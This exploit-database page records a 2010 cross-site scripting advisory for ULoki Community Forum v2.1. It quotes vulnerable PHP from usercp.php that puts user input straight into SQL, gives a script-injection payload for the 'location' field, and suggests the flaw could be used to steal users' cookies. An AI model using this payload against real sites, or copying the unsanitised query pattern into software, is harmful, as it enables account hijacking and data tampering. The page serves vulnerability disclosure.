header-logo
Suggest Exploit
vendor:
ULoki Community Forum
by:
Sioma Labs
7,5
CVSS
HIGH
Cross Site Scripting
79
CWE
Product Name: ULoki Community Forum
Affected Version From: v2.1
Affected Version To: v2.1
Patch Exists: NO
Related CWE:
CPE: 2.6:a:uloki:uloki_community_forum:2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP 2 / WAMP
2010

ULoki Community Forum v2.1 (usercp.php) Cross Site Scripting

ULoki Community Forum v2.1 is vulnerable to Cross Site Scripting (XSS) vulnerability. An attacker can inject malicious JavaScript code into the 'location' parameter of the 'usercp.php' page. This malicious code will be executed in the browser of the victim when the vulnerable page is accessed.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the vulnerable page.
Source

Exploit-DB raw data:

# Exploit Title: ULoki Community Forum v2.1 (usercp.php) Cross Site Scripting
# Date: 10/02/2010
# Author: Sioma Labs
# Software Link: http://www.uloki.com/download/uloki_forum_06_may_2009.zip
# Version: v2.1
# Tested on: Windows SP 2 / WAMP
# CVE : 
# Code : 

  ____  _                         _          _         
 / ___|(_) ___  _ __ ___   __ _  | |    __ _| |__  ___ 
 \___ \| |/ _ \| '_ ` _ \ / _` | | |   / _` | '_ \/ __|
  ___) | | (_) | | | | | | (_| | | |___ (_| | |_) \__ \
 |____/|_|\___/|_| |_| |_|\__,_| |_____\__,_|_.__/|___/
                                                       
 ======================================================


xSS Vuln Page

Vuln C0de (usercp.php) 
----------------------

$checke=$db->count_rows("SELECT email FROM b_users WHERE email='$email' AND userid='$user->userid'");
if($checke > 0)
{
print "</td></tr></table>";
$db->update_data("UPDATE b_users SET mb='$mb', location='$loc' WHERE userid='$user->userid'");
err_msg("User CP","Your information has been updated.");		
}

-----------------------

http://server/forum/usercp.php


POC
----

place this code on "location" 

"><script>alert(String.fromCharCode(88, 83, 83));</script>


--------------------------------------------------------


Note 
----

If an Attacker prefers the attacking process could be done by stealing cookies of other users  

-------------------------
Site: http://siomalabs.com
Author : Sioma Agent 154

Navigation

Suggest Exploit

Services By CQR